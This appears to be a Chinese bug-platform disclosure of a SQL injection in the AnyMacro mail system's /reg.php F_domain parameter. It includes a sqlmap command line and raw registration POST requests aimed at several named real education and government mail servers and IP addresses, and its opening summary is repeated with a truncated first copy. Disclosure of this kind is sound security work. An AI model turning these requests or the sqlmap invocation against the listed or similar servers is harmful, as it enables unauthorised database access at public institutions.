### 简要描述: AnyMacro安宁邮件系统前台注入 应该没有重复 不知道有没有两个$$ 顺便rank也多给点呗 ### 详细说明: anymacro是国内较流行的一家企业级邮箱系统,客户主要为教育/政府机构。漏洞影响范围参考以前的漏洞,就不一一贴出来了 漏洞文件: /reg.php 参数: F_domain 数据库: MYSQL sqlmap: --dbms mysql -p F_domain ### 漏洞证明: 1、 mail.imnc.edu.cn/reg.php ``` POST /reg.php HTTP/1.1 Host: mail.imnc.edu.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://mail.imnc.edu.cn/reg.php?F_lang= X-Forwarded-For: 8.8.8.8 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 209 F_lang=zh_gb&F_chkcode_enc=2Rzr9vXm7O8%3D&F_regpass=bma&F_name=bma&F_email=bma&F_domain=imnc.edu.cn&F_password=bma123&F_password2=bma123&F_chkcode=448428&p_office=111&p_phone=111&p_sex=%C4%D0&act=%D7%A2+%B2%E1 ``` [<img...
### 简要描述: AnyMacro安宁邮件系统前台注入 应该没有重复 不知道有没有两个$$ 顺便rank也多给点呗 ### 详细说明: anymacro是国内较流行的一家企业级邮箱系统,客户主要为教育/政府机构。漏洞影响范围参考以前的漏洞,就不一一贴出来了 漏洞文件: /reg.php 参数: F_domain 数据库: MYSQL sqlmap: --dbms mysql -p F_domain ### 漏洞证明: 1、 mail.imnc.edu.cn/reg.php ``` POST /reg.php HTTP/1.1 Host: mail.imnc.edu.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://mail.imnc.edu.cn/reg.php?F_lang= X-Forwarded-For: 8.8.8.8 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 209 F_lang=zh_gb&F_chkcode_enc=2Rzr9vXm7O8%3D&F_regpass=bma&F_name=bma&F_email=bma&F_domain=imnc.edu.cn&F_password=bma123&F_password2=bma123&F_chkcode=448428&p_office=111&p_phone=111&p_sex=%C4%D0&act=%D7%A2+%B2%E1 ``` [<img src="https://images.seebug.org/upload/201504/0715030856a0048491a9e136a962d972028581ed.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/0715030856a0048491a9e136a962d972028581ed.jpg) [<img src="https://images.seebug.org/upload/201504/071503301f9b21d255dd96cb246885e171f5c027.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/071503301f9b21d255dd96cb246885e171f5c027.jpg) [<img src="https://images.seebug.org/upload/201504/071503370821619eea232de42ca0df972b8ce0be.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/071503370821619eea232de42ca0df972b8ce0be.jpg) 2、 http://mail.ahedu.gov.cn/reg.php ``` POST /reg.php HTTP/1.1 Host: mail.ahedu.gov.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://mail.ahedu.gov.cn/reg.php X-Forwarded-For: 8.8.8.8 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 226 F_lang=zh_gb&F_chkcode_enc=VjNrd3aVg%2Bs%3D&F_regpass=bma123&F_name=bma123&F_email=bma&F_domain=ahedu.gov.cn&F_password=bma123&F_password2=bma123&F_chkcode=140957&p_office=bma&p_phone=18888888888&p_sex=%C4%D0&act=%D7%A2+%B2%E1 ``` [<img src="https://images.seebug.org/upload/201504/07150405391b7eb6a656850cb0c55a9291352805.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/07150405391b7eb6a656850cb0c55a9291352805.jpg) [<img src="https://images.seebug.org/upload/201504/07150416ce87f5cbf1cf4e12d43226edefac237c.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/07150416ce87f5cbf1cf4e12d43226edefac237c.jpg) 3、 http://218.29.128.229/anywebmail/reg.php?F_lang= ``` POST /anywebmail/reg.php HTTP/1.1 Host: 218.29.128.229 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://218.29.128.229/anywebmail/reg.php?F_lang= X-Forwarded-For: 8.8.8.8 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 314 F_lang=zh_gb&F_chkcode_enc=SaL1%2FDo96%2BY%3D&F_regpass=bma&F_name=bma&F_email=bma&F_domain=hnjmxy.cn&F_password=bma123&F_password2=bma123&F_chkcode=958133&p_office=bma&p_phone=18888888888&p_sex=%C4%D0&p_ldate_y=&p_ldate_m=1&p_ldate_d=1&p_lip=&p_ltype=&p_overtime_y=&p_overtime_m=1&p_overtime_d=1&act=%D7%A2+%B2%E1 ``` [<img src="https://images.seebug.org/upload/201504/071504487148c2ceeba502a0d714caffcf2c7808.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/071504487148c2ceeba502a0d714caffcf2c7808.jpg) 4、 http://211.82.176.10/reg.php?F_lang= ``` POST /reg.php HTTP/1.1 Host: 211.82.176.10 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://211.82.176.10/reg.php?F_lang= X-Forwarded-For: 8.8.8.8 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 222 F_lang=zh_gb&F_chkcode_enc=UwHizNs%2FcU4%3D&F_regpass=bma123&F_name=bma&F_email=bma&F_domain=imnc.edu.cn&F_password=bma123&F_password2=bma123&F_chkcode=629973&p_office=bma&p_phone=18888888888&p_sex=%C4%D0&act=%D7%A2+%B2%E1 ``` [<img src="https://images.seebug.org/upload/201504/07150504cb194e61ba7adc341886cecaa3d990c4.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/07150504cb194e61ba7adc341886cecaa3d990c4.jpg) 5、 http://218.29.128.229/reg.php ``` POST /reg.php HTTP/1.1 Host: 218.29.128.229 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://218.29.128.229/reg.php X-Forwarded-For: 8.8.8.8 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 217 F_lang=zh_gb&F_chkcode_enc=%2FGHzqFfxqM8%3D&F_regpass=bma&F_name=bma&F_email=bma&F_domain=hnjmxy.cn&F_password=bma123&F_password2=bma123&F_chkcode=858376&p_office=bma&p_phone=18888888888&p_sex=%C4%D0&act=%D7%A2+%B2%E1 ``` [<img src="https://images.seebug.org/upload/201504/07150522a74fedadd12bee2ca1d9cf9ea580f67a.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/07150522a74fedadd12bee2ca1d9cf9ea580f67a.jpg)